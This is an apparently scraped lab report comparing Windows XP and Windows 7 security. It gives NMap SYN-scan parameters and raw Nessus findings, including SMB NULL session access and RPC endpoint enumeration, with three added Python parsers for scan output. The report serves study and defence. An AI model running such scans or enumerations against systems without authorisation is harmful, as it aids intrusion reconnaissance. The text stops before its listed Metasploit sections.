Enterprise Architecture Testing
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 1/73
VANTAGE POINT COMPUTING
BEN DAHL
PAGE | 2
CONTENTS
Purpose ...................................................................... 3
Schedule ..................................................................... 4
Acquisitions ................................................................. 5
Installation ................................................................. 6
Patch Management and Configuration ........................................... 9
Network Discovery (NMap) .................................................... 12
    Network Map ............................................................. 12
    Windows XP .............................................................. 13
    Windows 7 ............................................................... 14
Vulnerability Scanning (Nessus) ............................................. 15
    Windows XP .............................................................. 15
    Windows 7 ............................................................... 22
Penetration Testing (Metasploit) ............................................ 59
    Exploits ................................................................ 59
        Microsoft Server Service Relative Path Stack Corruption ............. 59
        Internet Explorer XML Core Services HTTP Request Handling ........... 60
        Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution . 61
    Payloads ................................................................ 62
        Windows Meterpreter (Reflective Injection), Bind TCP Stager ......... 62
        Windows Meterpreter (Reflective Injection), Reverse TCP Stager ...... 62
    Windows XP .............................................................. 63
        Test 1 .............................................................. 63
        Test 2 .............................................................. 63
        Test 3 .............................................................. 64
        Test 4 .............................................................. 64
        Test 5 .............................................................. 65
        Test 6 .............................................................. 65
    Windows 7 ............................................................... 67
        Test 1 .............................................................. 67
        Test 2 .............................................................. 67
        Test 3 .............................................................. 68
        Test 4 .............................................................. 68
        Test 5 .............................................................. 69
        Test 6 .............................................................. 71
Conclusion .................................................................. 72
PURPOSE
Information is the most critical asset in any organization. Proprietary data,
information, and knowledge are just as valuable to a business as tangible assets. As such,
information needs to be suitably protected and secured in a fashion as rigorous as that of
other business assets. This is especially important with the increasing number of
vulnerabilities and threats and the interconnected nature of the business environment.
The Windows Operating Environment is the most common environment in the
corporate world. Currently, Windows XP represents the largest share of the market, but
Windows 7 looms on the horizon. Given a clean installation of the Windows Operating
Environment and physical access to the network, which operating system, Windows XP or
Windows 7, is more secure?
In order to execute this scenario, a lab environment will be created for testing
purposes. The lab will consist of one physical server running VirtualBox and two virtual
machines: one with Windows XP and the other with Windows 7 (both acquired through DePaul
via the MSDNAA). All tests will be performed from NETLAB (the physical server) in a manner
similar to that used in the Vantage Point Computing Security Policy.
Evaluation will be done in a manner similar to the IS433 and IS533 classes at DePaul. In
accordance with the following schedule, an infrastructure will be established and verified.
This will be followed by testing with NMAP, Nessus, and Metasploit to identify potential
vulnerabilities and then to test whether they can actually be exploited.
Ultimately, the final goal is to verify the security of the two Windows versions.
Windows XP has been tested, patched, and service packed over the course of almost a
decade. Windows 7 has been publicly available for less than a year. Did Microsoft learn
from their mistakes with Windows XP? Are all the vulnerabilities that were patched
throughout the lifecycle of Windows XP still secure, or are they open in Windows 7?
Furthermore, is the upgrade to Windows 7 recommended for enterprise use, or only for
home use? Throughout the course of testing, these questions, along with many others, will
be answered.
SCHEDULE
• Week One: Acquisitions
    o Acquire two lab machines
    o Acquire switch and cables
    o Acquire Windows XP
    o Acquire Windows 7
  Deliverable: Lab Environment pictures
• Week Two: Installation
    o Install Windows 7
    o Install Windows XP
    o Verify network connectivity of lab machines
  Deliverable: Windows Desktop Screenshots
• Week Three: Patch Management & Configuration
    o Install latest Windows 7 patches
    o Install latest Windows XP patches
    o Verify network connectivity of WHEELJACK
    o Verify functionality of testing tools on WHEELJACK
  Deliverable: netstat -ano screenshots
• Week Four & Five: NMAP
    o Execute NMAP scans to map network
  Deliverable: NMAP network map
  Deliverable: NMAP Report Draft
• Week Six & Seven: Nessus
    o Run Nessus scans on Windows XP
    o Run Nessus scans on Windows 7
  Deliverable: Nessus Report Files
  Deliverable: Nessus Report Draft
• Week Eight & Nine: Metasploit
    o Run Metasploit against Windows XP
    o Run Metasploit against Windows 7
  Deliverable: Metasploit console screenshots
  Deliverable: Metasploit Report Draft
• Week Ten:
    o Final testing
    o Revisions
  Deliverable: Final project report
ACQUISITIONS
o Acquire two lab machines
o Acquire switch and cables
o Acquire Windows XP
o Acquire Windows 7
As opposed to acquiring two separate lab machines, and after discussions with James Krev, the
acquisitions assignment was modified to reflect virtualization using Sun VirtualBox. VirtualBox was
installed on a physical server (NETLAB) running Windows XP.
Additionally, Windows XP and Windows 7 were downloaded and installed as separate virtual
instances within VirtualBox.
INSTALLATION
o Install Windows 7
o Install Windows XP
o Verify network connectivity of lab machines
The following screenshots depict the virtual installations of Windows 7.
Windows7: ipconfig /all – To verify network connectivity and acquisition of an IP address.
Windows7: netstat -ano – Displays open ports and Process IDs.
The following screenshots depict the virtual installations of Windows XP.
WindowsXP: ipconfig /all – To verify network connectivity and acquisition of an IP address.
WindowsXP: netstat -ano – Displays open ports and Process IDs.
PATCH MANAGEMENT AND CONFIGURATION
o Install latest Windows 7 patches
o Install latest Windows XP patches
o Verify network connectivity of NETLAB
o Verify functionality of testing tools on NETLAB
The following screenshot depicts the virtual installations of Windows 7.
Windows7: Windows Update – To verify the operating system is patched to the most recent
version.
The following screenshot depicts the virtual installations of Windows XP.
WindowsXP: Windows Update – To verify the operating system is patched to the most recent
version.
The following screenshots depict the NETLAB server.
NETLAB: ipconfig /all – To verify network connectivity.
NETLAB: Tools (Nessus / NMap / Metasploit)
NETWORK DISCOVERY (NMAP)
NMap was used to create a complete network topology of the local area network that NETLAB
(including the virtual machines) is part of.
Local Address 192.168.0.166 is the IP address of the Windows XP virtual machine.
Local Address 192.168.0.171 is the IP address of the Windows 7 virtual machine.
NMap was used with the following parameters:
-p1-65535 - Scan ports 1 through 65535 (the full TCP port range).
-T4 - Timing template 4 (aggressive), which speeds up the scans.
-sS - TCP SYN ("stealth") scan: NMap never completes the TCP handshake.
192.168.0.1/24 - Scan all hosts on the local network to create the map.
192.168.0.166 - Scan the Windows XP virtual machine.
192.168.0.171 - Scan the Windows 7 virtual machine.
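The parameters above produce one scan per target, and what a defender keeps from such a scan is the per-host inventory of open ports measured against the 65535-port range. The following Python script, an added example that is not part of the original report, parses nmap's grepable (-oG) output for exactly that: per host, the open ports and the count of ports nmap folded into its "Ignored State" line, plus a check that the two add up to the full range scanned. The sample output embedded in it is constructed to mirror the results reported later on this page (every XP port filtered, seven Win7 ports open); the specific Win7 port numbers are assumptions, not taken from the page.

```python
"""Summarise nmap grepable (-oG) output: open ports per host vs. the scanned range.

Added example, not part of the original report. The sample output below is
constructed; the Windows 7 port numbers are assumptions, not page data.
"""
import re

# Constructed sample in nmap's -oG format (labelled: not a real capture).
SAMPLE_GNMAP = (
    "# Nmap 5.00 scan initiated Mon Nov 23 2009 as: nmap -p1-65535 -T4 -sS -oG - "
    "192.168.0.166 192.168.0.171\n"
    "Host: 192.168.0.166 ()\tStatus: Up\n"
    "Host: 192.168.0.166 ()\tPorts: \tIgnored State: filtered (65535)\n"
    "Host: 192.168.0.171 ()\tStatus: Up\n"
    "Host: 192.168.0.171 ()\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "49152/open/tcp/////, 49153/open/tcp/////, 49154/open/tcp/////, "
    "49155/open/tcp/////\tIgnored State: filtered (65528)\n"
    "# Nmap done at Mon Nov 23 2009 -- 2 IP addresses (2 hosts up) scanned\n"
)

# One port entry looks like "135/open/tcp//msrpc///" (port/state/proto//service//).
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/,\s]*)//")
IGNORED_RE = re.compile(r"Ignored State: (\w+) \((\d+)\)")


def parse_gnmap(text):
    """Return {ip: {"open": [(port, proto, service), ...],
                    "ignored_state": str|None, "ignored_count": int}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment lines and the "Nmap done" trailer
        ip = line.split()[1]
        rec = hosts.setdefault(
            ip, {"open": [], "ignored_state": None, "ignored_count": 0})
        if "Ports:" not in line:
            continue  # the "Status: Up" line carries no port data
        for port, state, proto, service in PORT_RE.findall(line):
            if state == "open":
                rec["open"].append((int(port), proto, service))
        m = IGNORED_RE.search(line)
        if m:
            rec["ignored_state"] = m.group(1)
            rec["ignored_count"] = int(m.group(2))
    return hosts


def coverage_ok(rec, scanned=65535):
    """True when listed ports plus the ignored-state count equal the range scanned.

    A shortfall means the scan was cut short or the output was truncated, so an
    'all filtered' or 'N open' conclusion drawn from it would not be trustworthy.
    """
    return len(rec["open"]) + rec["ignored_count"] == scanned


def open_ports(rec):
    """Sorted open port numbers for one host record (the baseline to diff against)."""
    return sorted(p for p, _, _ in rec["open"])


if __name__ == "__main__":
    for ip, rec in parse_gnmap(SAMPLE_GNMAP).items():
        print(f"{ip}: {len(rec['open'])} open, {rec['ignored_count']} "
              f"{rec['ignored_state']}, full coverage={coverage_ok(rec)}")
        print("   open ports:", open_ports(rec))
```

The coverage check is the part worth keeping: a "65535 ports, all filtered" result is only meaningful if the scan really covered 65535 ports, and grepable output makes that arithmetic trivial to verify before the number goes into a report.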
NETWORK MAP
WINDOWS XP
The NMap scan of Windows XP revealed 65535 scanned ports, all of which were filtered.
WINDOWS 7
The NMap scan of the Windows 7 virtual machine scanned 65535 ports, 7 of which were open.
VULNERABILITY SCANNING (NESSUS)
WINDOWS XP
192.168.0.166
Scan time :
Start time : Mon Nov 23 14:14:17 2009
End time : Mon Nov 23 14:14:41 2009
Number of vulnerabilities :
Open ports : 5
Low : 8
Medium : 0
High : 0
Information about the remote host :
Operating system : (unknown)
NetBIOS name : WINXP
DNS name : (unknown)
Port netbios-ns (137/udp)
Using NetBIOS or SMB to retrieve information from a Windows host
Synopsis :
It is possible to obtain the network name of the remote host.
Description :
The remote host listens on UDP port 137 or TCP port 445 and replies to
NetBIOS nbtscan or SMB requests.
Note that this plugin gathers information to be used in other plugins
but does not itself generate a report.
Solution :
n/a
Risk factor :
None
Plugin output :
The following 6 NetBIOS names have been gathered :
WINXP = Computer name
WORKGROUP = Workgroup / Domain name
WINXP = File Server Service
WORKGROUP = Browser Service Elections
WORKGROUP = Master Browser
__MSBROWSE__ = Master Browser
The remote host has the following MAC address on its adapter :
08:00:27:09:16:8a
Nessus ID : 10150
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
SMB NativeLanMan
Synopsis :
It is possible to obtain information about the remote operating
system.
Description :
It is possible to get the remote operating system name and
version (Windows and/or Samba) by sending an authentication
request to port 139 or 445.
Solution :
n/a
Risk factor :
None
Plugin output :
The remote Operating System is : Windows 5.1
The remote native lan manager is : Windows 2000 LAN Manager
The remote SMB Domain Name is : WINXP
Nessus ID : 10785
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
account :
- NULL session
- Guest account
- Given Credentials
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595
BID : 494, 990, 11199
Nessus ID : 10394
SMB LanMan Pipe Server browse listing
Synopsis :
It is possible to obtain network information.
Description :
It was possible to obtain the browse list of the remote Windows system
by send a request to the LANMAN pipe. The browse list is the list of
the nearest Windows systems of the remote host.
Solution :
n/a
Risk factor :
None
Plugin output :
Here is the browse list of the remote host :
WINXP ( os : 5.1 )
Other references : OSVDB:300
Nessus ID : 10397
SMB NULL session
Synopsis :
It is possible to log into the remote Windows host with a NULL session.
Description :
The remote host is running Microsoft Windows, and it was possible to
log into it using a NULL session (ie, with no login or password). An
unauthenticated remote attacker can leverage this issue to get
information about the remote host.
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
CVE : CVE-2002-1117
BID : 494
Nessus ID : 26920
SMB registry can not be accessed by the scanner
Synopsis :
Nessus is not able to access the remote Windows Registry.
Description :
It was not possible to connect to PIPE\winreg on the remote host.
If you intend to use Nessus to perform registry-based checks, the
registry checks will not work because the 'Remote Registry Access'
service (winreg) has been disabled on the remote host or can not be
connected to with the supplied credentials.
Solution :
n/a
Risk factor :
None
Nessus ID : 26917
Port epmap (135/tcp)
Port icslap (2869/tcp)
Port netbios-ssn (139/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol,
used to provide shared access to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
An SMB server is running on this port.
Nessus ID : 11011
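Every finding in the Windows XP listing above carries "Risk factor : None", yet two of them (Nessus IDs 10394 and 26920) report that a NULL session, an SMB login with no username or password, succeeded. A defender triaging this text format should not rely on the risk label alone. The script below, added here and not part of the original report, parses findings in this Nessus text layout (a "Port" header, a plugin title, "Field :" lines, each finding terminated by "Nessus ID :") into records, collects their CVE references, and flags the anonymous-access findings regardless of the risk label. The embedded sample is an excerpt reconstructed from the Windows XP findings on this page.

```python
"""Parse Nessus text-report findings and flag anonymous (NULL session) access.

Added example, not part of the original report. The sample below is an
excerpt reconstructed from the Windows XP findings on this page.
"""
import re
from collections import Counter

SAMPLE_REPORT = """\
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Solution :
n/a
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
account :
- NULL session
- Guest account
- Given Credentials
Solution :
n/a
Risk factor :
None
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595
BID : 494, 990, 11199
Nessus ID : 10394
SMB NULL session
Synopsis :
It is possible to log into the remote Windows host with a NULL session.
Solution :
n/a
Risk factor :
None
CVE : CVE-2002-1117
BID : 494
Nessus ID : 26920
Port epmap (135/tcp)
"""

PORT_RE = re.compile(r"^Port (\S+) \((\d+)/(tcp|udp)\)$")
FIELD_RE = re.compile(
    r"^(Synopsis|Description|See also|Solution|Risk factor|Plugin output|"
    r"CVE|BID|Other references|Nessus ID) ?: ?(.*)$")

# Plugins on this page whose output means an unauthenticated SMB login worked.
ANONYMOUS_ACCESS_PLUGINS = {10394: "SMB log in", 26920: "SMB NULL session"}


def parse_findings(text):
    """Return a list of finding dicts: port, title, nessus_id and one key per field."""
    findings, port, cur, field = [], None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PORT_RE.match(line)
        if m:  # "Port microsoft-ds (445/tcp)" opens a new port section
            port = (m.group(1), int(m.group(2)), m.group(3))
            cur = None
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            field, value = m.group(1), m.group(2).strip()
            if field == "Nessus ID":  # closes the current finding
                cur["nessus_id"] = int(value)
                findings.append(cur)
                cur = None
            else:
                cur[field] = value
            continue
        if cur is None:  # first line after a port header or a finding is the plugin title
            cur = {"port": port, "title": line}
            field = None
        elif field is not None:  # continuation line of a multi-line field
            cur[field] = (cur[field] + " " + line).strip()
    return findings


def cve_refs(finding):
    """CVE identifiers listed on the finding's 'CVE :' line (empty if none)."""
    return [c.strip() for c in finding.get("CVE", "").split(",") if c.strip()]


def anonymous_access(findings):
    """Findings whose plugin reports an unauthenticated login, whatever the risk label says."""
    return [f for f in findings if f["nessus_id"] in ANONYMOUS_ACCESS_PLUGINS]


def risk_summary(findings):
    """Count of findings per Nessus risk label."""
    return Counter(f.get("Risk factor", "?") for f in findings)


if __name__ == "__main__":
    fs = parse_findings(SAMPLE_REPORT)
    print("risk labels:", dict(risk_summary(fs)))
    for f in anonymous_access(fs):
        print(f"anonymous access on {f['port'][1]}/{f['port'][2]}: "
              f"{f['title']} (Nessus ID {f['nessus_id']}, CVEs {cve_refs(f)})")
```

The point of separating `anonymous_access` from `risk_summary` is that the two disagree on this report: the label says nothing needs attention, while the plugin output says an unauthenticated client can enumerate the host. Tracking the second signal is what turns a scan listing into a hardening item.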
WINDOWS 7
192.168.0.171
Scan time :
Start time : Mon Nov 23 13:52:49 2009
End time : Mon Nov 23 13:53:33 2009
Number of vulnerabilities :
Open ports : 12
Low : 16
Medium : 0
High : 0
Information about the remote host :
Operating system : (unknown)
NetBIOS name : WIN7
DNS name : (unknown)
Port unknown (49155/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49155 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
Nessus ID : 10736
Port netbios-ns (137/udp)
Using NetBIOS or SMB to retrieve information from a Windows host
Synopsis :
It is possible to obtain the network name of the remote host.
Description :
The remote host listens on UDP port 137 or TCP port 445 and replies to
NetBIOS nbtscan or SMB requests.
Note that this plugin gathers information to be used in other plugins
but does not itself generate a report.
Solution :
n/a
Risk factor :
None
Plugin output :
The following 6 NetBIOS names have been gathered :
WIN7 = Computer name
WORKGROUP = Workgroup / Domain name
WIN7 = File Server Service
WORKGROUP = Browser Service Elections
WORKGROUP = Master Browser
__MSBROWSE__ = Master Browser
The remote host has the following MAC address on its adapter :
08:00:27:ef:92:b3
Nessus ID : 10150
Port unknown (49156/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49156 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49156
IP : 192.168.0.171
Nessus ID : 10736
Port unknown (49153/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49153 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Nessus ID : 10736
Port unknown (49154/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49154 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Nessus ID : 10736
Port unknown (49152/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49152 :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49152
IP : 192.168.0.171
Nessus ID : 10736
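The DCE Services Enumeration findings above (ports 49155, 49156, 49153, 49154 and 49152, and the named-pipe listing on 445/tcp that follows) print one record per endpoint, and the same interface, for example the Security Account Manager UUID served by lsass.exe, shows up on several transports. For a defender the useful product is an inventory: which interfaces are reachable over which dynamic ports or named pipes, and which of those are sensitive. The script below, added here and not part of the original report, parses that record layout and builds the inventory. Its sample is an excerpt of the records printed on this page, and its table of sensitive interfaces uses only UUIDs and descriptions that appear in these findings.

```python
"""Build a per-transport inventory of DCERPC endpoints from Nessus plugin output.

Added example, not part of the original report. The sample records below are
an excerpt of the plugin output shown on this page (not a new capture).
"""
import re
from collections import defaultdict

SAMPLE_PLUGIN_OUTPUT = r"""
The following DCERPC services are available on TCP port 49155 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
The following DCERPC services are available remotely :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
"""

# Interface UUIDs taken from the findings on this page, with the descriptions
# Nessus printed for them; these are the ones a reviewer would want highlighted.
SENSITIVE_INTERFACES = {
    "12345778-1234-abcd-ef00-0123456789ac": "Security Account Manager (lsass.exe)",
    "1ff70682-0a51-30e8-076d-740be8cee98b": "Scheduler Service (\\PIPE\\atsvc)",
    "378e52b0-c0a9-11cf-822d-00aa0051e40f": "Scheduler Service (\\PIPE\\atsvc)",
}

# "Key : value" lines; banner lines such as "The following DCERPC ..." do not match.
KEY_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?) : (.*)$")


def parse_endpoints(text):
    """Return one dict per 'Object UUID' record; keys are lower-case field names."""
    endpoints, cur = [], None
    for raw in text.splitlines():
        m = KEY_RE.match(raw.strip())
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Object UUID":  # every record starts with this line
            cur = {"object_uuid": value}
            endpoints.append(cur)
        elif cur is not None:
            if key == "UUID":  # "UUID : <uuid>, version <ver>"
                uuid, _, version = value.partition(", version ")
                cur["uuid"], cur["version"] = uuid.lower(), version
            else:
                cur[key.lower().replace(" ", "_")] = value
    return endpoints


def transport(ep):
    """'tcp/<port>' for dynamic-port endpoints, 'pipe:<name>' for named pipes."""
    if "tcp_port" in ep:
        return "tcp/" + ep["tcp_port"]
    return "pipe:" + ep.get("named_pipe", "?")


def inventory(endpoints):
    """Map transport -> list of (uuid, label); the label prefers the annotation."""
    inv = defaultdict(list)
    for ep in endpoints:
        label = ep.get("annotation") or ep.get("description", "?")
        inv[transport(ep)].append((ep["uuid"], label))
    return dict(inv)


def sensitive_exposure(endpoints):
    """(transport, description) for every endpoint serving a sensitive interface."""
    return [(transport(ep), SENSITIVE_INTERFACES[ep["uuid"]])
            for ep in endpoints if ep["uuid"] in SENSITIVE_INTERFACES]


if __name__ == "__main__":
    eps = parse_endpoints(SAMPLE_PLUGIN_OUTPUT)
    for tr, ifaces in inventory(eps).items():
        print(tr)
        for uuid, label in ifaces:
            print(f"  {uuid}  {label}")
    print("sensitive:", sensitive_exposure(eps))
```

Run over the full set of findings, the inventory answers the question the raw listing obscures: how many distinct interfaces the Windows 7 host exposes, on how many transports, and whether the sensitive ones are reachable only through 445/tcp or also through the dynamic ports in the 49152 range. That is the baseline to compare against after firewall or service changes.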
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available remotely :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\InitShutdown
Netbios name : \\WIN7
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\InitShutdown
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \pipe\trkwks
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \PIPE\protected_storage
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
Named pipe : \PIPE\protected_storage
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
